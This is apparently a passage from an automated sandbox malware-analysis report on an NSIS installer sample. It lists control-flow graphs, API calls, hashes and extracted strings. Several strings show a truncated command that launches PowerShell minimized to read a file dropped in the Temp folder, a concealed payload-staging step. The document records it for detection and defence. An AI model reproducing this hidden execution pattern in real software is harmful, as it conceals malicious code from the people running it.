406554-40656a SHGetSpecialFolderLocation 486->492 493 40653c-40653f 486->493 487->484 490 40659b-4065a1 lstrcatW 487->490 488->480 489->487 490->484 496 406585 492->496 497 40656c-406583 SHGetPathFromIDListW CoTaskMemFree 492->497 493->492 495 406541-406548 493->495 499 406550-406552 495->499 496->482 497->480 497->496 499->480 499->492
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 00406513
                                                                                              • GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,?,0040544B,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000), ref: 00406526
                                                                                              • SHGetSpecialFolderLocation.SHELL32(0040544B,00000000,00000000,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,?,0040544B,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000), ref: 00406562
                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 00406570
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 0040657B
                                                                                              • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065A1
                                                                                              • lstrlenW.KERNEL32(004281E0,00000000,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,?,0040544B,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000), ref: 004065F9
                                                                                              Strings
                                                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 004064E3
                                                                                              • Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond, xrefs: 004063F7
                                                                                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040659B
                                                                                              • "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immin, xrefs: 004065CF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                              • String ID: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immin$Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                              • API String ID: 717251189-854949449
                                                                                              • Opcode ID: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
                                                                                              • Instruction ID: 781aa6555cb08bc9a39a1310e2b7c8a7a94b670d8f790df7948cd7d686d0a9f3
                                                                                              • Opcode Fuzzy Hash: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
                                                                                              • Instruction Fuzzy Hash: 52611771600101ABDF209F54ED40ABE37A5AF40314F56453FE947B62D4D73D8AA2CB5D

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 500 40176f-401794 call 402c37 call 405cf8 505 401796-40179c call 4063b0 500->505 506 40179e-4017b0 call 4063b0 call 405c81 lstrcatW 500->506 511 4017b5-4017b6 call 406644 505->511 506->511 515 4017bb-4017bf 511->515 516 4017c1-4017cb call 4066f3 515->516 517 4017f2-4017f5 515->517 524 4017dd-4017ef 516->524 525 4017cd-4017db CompareFileTime 516->525 518 4017f7-4017f8 call 405e7d 517->518 519 4017fd-401819 call 405ea2 517->519 518->519 527 40181b-40181e 519->527 528 40188d-4018b6 call 405414 call 4031ba 519->528 524->517 525->524 529 401820-40185e call 4063b0 * 2 call 4063d2 call 4063b0 call 405a12 527->529 530 40186f-401879 call 405414 527->530 540 4018b8-4018bc 528->540 541 4018be-4018ca SetFileTime 528->541 529->515 562 401864-401865 529->562 542 401882-401888 530->542 540->541 544 4018d0-4018db CloseHandle 540->544 541->544 545 402ac8 542->545 548 4018e1-4018e4 544->548 549 402abf-402ac2 544->549 550 402aca-402ace 545->550 552 4018e6-4018f7 call 4063d2 lstrcatW 548->552 553 4018f9-4018fc call 4063d2 548->553 549->545 559 401901-4022f6 call 405a12 552->559 553->559 559->549 559->550 562->542 564 401867-401868 562->564 564->530
                                                                                              APIs
                                                                                              • lstrcatW.KERNEL32(00000000,00000000,%karnis%\Alpeviolerne,C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles,?,?,00000031), ref: 004017B0
                                                                                              • CompareFileTime.KERNEL32(-00000014,?,%karnis%\Alpeviolerne,%karnis%\Alpeviolerne,00000000,00000000,%karnis%\Alpeviolerne,C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles,?,?,00000031), ref: 004017D5
                                                                                                • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                                                • Part of subcall function 00405414: lstrlenW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                • Part of subcall function 00405414: lstrcatW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00402EEC,00402EEC,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000), ref: 0040546F
                                                                                                • Part of subcall function 00405414: SetWindowTextW.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond), ref: 00405481
                                                                                                • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                              • String ID: %karnis%\Alpeviolerne$C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles$C:\Windows\Fonts\appendicits.bun$formagen\Uninstall\frustulose
                                                                                              • API String ID: 1941528284-1091800651
                                                                                              • Opcode ID: 9ebfb073946ae121058b631f201891bc3017374c4b83706ff41abab8acdbf7d0
                                                                                              • Instruction ID: 6d789f9af123ab0f865e5502c846d56d3cd3544f1fa5f1ae7e054fd30d3333f6
                                                                                              • Opcode Fuzzy Hash: 9ebfb073946ae121058b631f201891bc3017374c4b83706ff41abab8acdbf7d0
                                                                                              • Instruction Fuzzy Hash: E741D871510115BACF117BA5CD45EAF3679EF01328B20423FF922F10E1DB3C8A519AAE

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 566 405414-405429 567 4054e0-4054e4 566->567 568 40542f-405440 566->568 569 405442-405446 call 4063d2 568->569 570 40544b-405457 lstrlenW 568->570 569->570 572 405474-405478 570->572 573 405459-405469 lstrlenW 570->573 575 405487-40548b 572->575 576 40547a-405481 SetWindowTextW 572->576 573->567 574 40546b-40546f lstrcatW 573->574 574->572 577 4054d1-4054d3 575->577 578 40548d-4054cf SendMessageW * 3 575->578 576->575 577->567 579 4054d5-4054d8 577->579 578->577 579->567
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                              • lstrlenW.KERNEL32(00402EEC,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                              • lstrcatW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00402EEC,00402EEC,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000), ref: 0040546F
                                                                                              • SetWindowTextW.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond), ref: 00405481
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                              • String ID: Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond
                                                                                              • API String ID: 2531174081-3566825971
                                                                                              • Opcode ID: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
                                                                                              • Instruction ID: b4c9d1203d7b93b364d12d55a96473d81469f1a16e33619bfa53f57c996d0385
                                                                                              • Opcode Fuzzy Hash: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
                                                                                              • Instruction Fuzzy Hash: 0E219071900518BACF119FA5DD85ADFBFB4EF45364F10803AF904B62A0C3794A90CFA8

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetDC.USER32(?), ref: 00401DB6
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                                                              • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                              • String ID: Calibri
                                                                                              • API String ID: 3808545654-1409258342
                                                                                              • Opcode ID: 331e2bd8f52134edb3c64bcd1810fd6956bccb8f00eaf7712ca7db7d847b41c1
                                                                                              • Instruction ID: c2f05a2c3ba2ec5405c4fe8fe652dd8f1d703414ee124caa90b8b383e79e86eb
                                                                                              • Opcode Fuzzy Hash: 331e2bd8f52134edb3c64bcd1810fd6956bccb8f00eaf7712ca7db7d847b41c1
                                                                                              • Instruction Fuzzy Hash: 3201B171904241EFE7006BB0AF4AB9A7FB0BF55301F10493EF242B71E2CAB800469B2D

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 594 40671a-40673a GetSystemDirectoryW 595 40673c 594->595 596 40673e-406740 594->596 595->596 597 406751-406753 596->597 598 406742-40674b 596->598 600 406754-406787 wsprintfW LoadLibraryExW 597->600 598->597 599 40674d-40674f 598->599 599->600
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
                                                                                              • wsprintfW.USER32 ref: 0040676C
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406780
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                              • API String ID: 2200240437-1946221925
                                                                                              • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                              • Instruction ID: 212fe184e71725d5a8014c1118872f5233ada1a9ecb6260670121aae60094f83
                                                                                              • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                              • Instruction Fuzzy Hash: BBF02170510119ABCF10BB64DD0DF9B375CAB00305F50447AA546F20D1EBBCDA78C798

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 601 405ed1-405edd 602 405ede-405f12 GetTickCount GetTempFileNameW 601->602 603 405f21-405f23 602->603 604 405f14-405f16 602->604 606 405f1b-405f1e 603->606 604->602 605 405f18 604->605 605->606
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00405EEF
                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\REnBTVfW8q.exe",00403487,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036D5), ref: 00405F0A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountFileNameTempTick
                                                                                              • String ID: "C:\Users\user\Desktop\REnBTVfW8q.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                              • API String ID: 1716503409-238990537
                                                                                              • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                              • Instruction ID: 6418149b7de8853f47a359c443b4445f7a51012143164c36937b703eba88611a
                                                                                              • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                              • Instruction Fuzzy Hash: 51F03076A00204FBEB009F59ED05E9BB7ACEB95750F10803AED41F7250E6B49A54CB69

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 691 4015c1-4015d5 call 402c37 call 405d2c 696 401631-401634 691->696 697 4015d7-4015ea call 405cae 691->697 699 401663-40224a call 401423 696->699 700 401636-401655 call 401423 call 4063b0 SetCurrentDirectoryW 696->700 704 401604-401607 call 405960 697->704 705 4015ec-4015ef 697->705 715 402885-40288c 699->715 716 402abf-402ace 699->716 700->716 721 40165b-40165e 700->721 712 40160c-40160e 704->712 705->704 709 4015f1-4015f8 call 40597d 705->709 709->704 725 4015fa-401602 call 4058e3 709->725 717 401610-401615 712->717 718 401627-40162f 712->718 715->716 722 401624 717->722 723 401617-401622 GetFileAttributesW 717->723 718->696 718->697 721->716 722->718 723->718 723->722 725->712
                                                                                              APIs
                                                                                                • Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,75572EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405D3A
                                                                                                • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
                                                                                                • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                • Part of subcall function 004058E3: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405926
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles,?,00000000,000000F0), ref: 0040164D
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles, xrefs: 00401640
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles
                                                                                              • API String ID: 1892508949-720499180
                                                                                              • Opcode ID: f783c70205095edd546df2d229ea399aa307a44456b5082c487d023ef568edfb
                                                                                              • Instruction ID: a4cb8c34a70438e14e420fb04ab38ad532f12a03bdfc5322accc4ce246dd33dc
                                                                                              • Opcode Fuzzy Hash: f783c70205095edd546df2d229ea399aa307a44456b5082c487d023ef568edfb
                                                                                              • Instruction Fuzzy Hash: 9011BE31504104EBCF31AFA0CD0199F36A0EF14368B28493BEA45B22F1DB3E4D51DA4E

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 728 405995-4059c6 CreateProcessW 729 4059d4-4059d5 728->729 730 4059c8-4059d1 CloseHandle 728->730 730->729
                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
                                                                                              • CloseHandle.KERNEL32(?), ref: 004059CB
                                                                                              Strings
                                                                                              • Error launching installer, xrefs: 004059A8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleProcess
                                                                                              • String ID: Error launching installer
                                                                                              • API String ID: 3712363035-66219284
                                                                                              • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                              • Instruction ID: 7702c274cdf70951028335e9b96fa9876c0cc9a795fc840707e03dbfe60e7272
                                                                                              • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                              • Instruction Fuzzy Hash: B4E046F0A00209BFEB009BA4ED09F7BBAACFB04208F418431BD00F6190D774A8208A78
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
